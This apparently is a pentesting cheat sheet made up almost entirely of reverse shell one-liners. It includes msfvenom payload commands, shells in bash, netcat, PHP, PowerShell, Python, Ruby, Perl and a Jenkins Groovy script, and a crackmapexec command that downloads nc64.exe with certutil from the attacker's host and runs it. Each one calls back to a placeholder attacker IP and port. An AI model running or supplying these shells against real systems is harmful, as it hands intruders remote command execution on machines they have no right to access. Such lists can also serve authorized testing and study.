% rev shells cheats
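$ IP: ip -4 -o addr show | awk '{print $4}' | cut -d '/' -f 1 | uniq  # one IPv4 per line for every interface (lo included); the previous nested-loop form needed the MariaDB-only 'replace' binary and, because it word-split the whole 'ip a s' output into one line, effectively yielded a single interface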
# x86 normal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe
# x64 (CMD Single Stage)
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe
# reverse HTTP
msfvenom -p windows/meterpreter/reverse_http LHOST=<IP> LPORT=<port> -f exe
# reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=<port> -f exe
# Powershell Payload
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<port>
# Macro Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f vba
# JSP rev shell (msfvenom)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw
# Bash RevShell
bash -i >& /dev/tcp/<IP>/<port> 0>&1
# Netcat OpenBSD RevShell [nc-mkfifo]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
# Minimal PHP Rev Shell
php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/bash -i <&3 >&3 2>&3");'
# nc plain Rev Shell
nc -e /bin/bash <IP> <port>
# Windows PowerShell RevShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<IP>",<port>); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};$client.Close()
# Python Rev Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
# Ruby Rev Shell
ruby -rsocket -e'f=TCPSocket.open("<IP>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# crackmapexec (Windows-specific): the target downloads nc64.exe from a web server on your box (tun0, port 80) and runs it, with the reverse shell calling back to port 443.
cme smb <target> -u <user-list> -d <target> -p <pass-list> -X "certutil.exe -urlcache -split -f http://<IP>/nc64.exe nc64.exe; .\nc64.exe <IP> 443 -e powershell.exe";
# Jenkins Rev Shell [Groovy Script]
String host=<IP>;int port=<port>;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
# Perl Rev Shell
perl -e 'use Socket;$i="<IP>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'